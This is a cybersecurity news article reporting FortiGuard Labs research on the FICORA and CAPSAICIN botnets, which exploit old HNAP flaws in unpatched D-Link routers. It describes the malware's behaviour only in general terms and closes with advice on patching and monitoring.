HomeCyber BalkansNew Botnet Exploiting D-Link Routers for Remote Control

New Botnet Exploiting D-Link Routers for Remote Control

Published on

spot_img

Recent research has pointed out a concerning increase in cyber activity related to the “FICORA” and “CAPSAICIN” botnets, unleashed by hackers to exploit known vulnerabilities in D-Link routers, particularly those running outdated firmware like DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.

The attackers are taking advantage of the HNAP protocol to remotely execute malicious commands on vulnerable devices. This exploitation method has been around for years but continues to be effective due to the prevalence of unpatched systems, underscoring the importance of timely firmware updates and robust security measures to counter these persistent threats.

Operating from servers based in the Netherlands, the cybercriminals behind the “FICORA” botnet have launched a wide-ranging attack impacting numerous countries globally. This indiscriminate assault indicates that the hackers’ intentions were not limited to specific targets, raising concerns about the scale and reach of these malicious activities.

In contrast to the broad scope of the “FICORA” campaign, the “CAPSAICIN” botnet has been more selective in its targets, with a concentrated offensive observed in East Asian regions on October 21st and 22nd, 2024.

The “FICORA” botnet, classified as a Linux malware variant of the infamous Mirai botnet, can spread the FICORA malware using techniques such as wget, ftpget, curl, and tftp. Before downloading various versions tailored for different Linux architectures, the malware terminates processes with the same file extension as itself. It utilizes ChaCha20 encryption to preserve its configuration, including the C2 server domain and a unique string, while also incorporating a hardcoded username and password list for brute-force attacks and a shell script to identify and halt processes containing the keyword “dvrHelper.”

On the other hand, the “CAPSAICIN” malware, believed to be a derivative of botnets developed by the Keksec group, is distributed from a malicious server and targets diverse Linux architectures by connecting with its C2 server to transmit victim host data. This malware can terminate processes associated with rival botnets, set up environment variables, and carry out DDoS attacks as per instructions received from the C2 server.

The research conducted by FortiGuard Labs uncovered that “FICORA” and “CAPSAICIN” exploit an outdated, patched kernel vulnerability dating back a decade, highlighting the enduring menace posed by unpatched systems. Despite the antiquity of this vulnerability, the attacks exploiting it persist, emphasizing the urgent need for regular kernel updates across enterprise devices. It is crucial for organizations to deploy comprehensive monitoring systems to identify and counter potential malware deployments capitalizing on this and other vulnerabilities.

By taking proactive measures like regular firmware updates, robust security protocols, and continuous monitoring, businesses can significantly reduce their exposure to these ongoing cyber threats, safeguarding their operations and data against malicious intrusions.

Source link

Latest articles

Users of Trump’s Truth Social are falling victim to widespread scams on the internet

The social media platform Truth Social, launched by the Trump Media & Technology Group...

Hacking group exposes information on 15k vulnerable FortiGate firewall devices

A recent development in the ongoing cybersecurity saga involving vulnerable Fortinet FortiGate firewall devices...

Biotech company resolves class action lawsuit stemming from ransomware attack with $7.5 million settlement

Enzo Biochem, a prominent biotech company, recently made headlines after agreeing to settle a...

Aadhaar-based biometric verification required for new SIM cards to combat fraud and cybercrime – StartupNews.fyi

The Indian government has announced a new measure to combat fraudulent activities associated with...

More like this

Users of Trump’s Truth Social are falling victim to widespread scams on the internet

The social media platform Truth Social, launched by the Trump Media & Technology Group...

Hacking group exposes information on 15k vulnerable FortiGate firewall devices

A recent development in the ongoing cybersecurity saga involving vulnerable Fortinet FortiGate firewall devices...

Biotech company resolves class action lawsuit stemming from ransomware attack with $7.5 million settlement

Enzo Biochem, a prominent biotech company, recently made headlines after agreeing to settle a...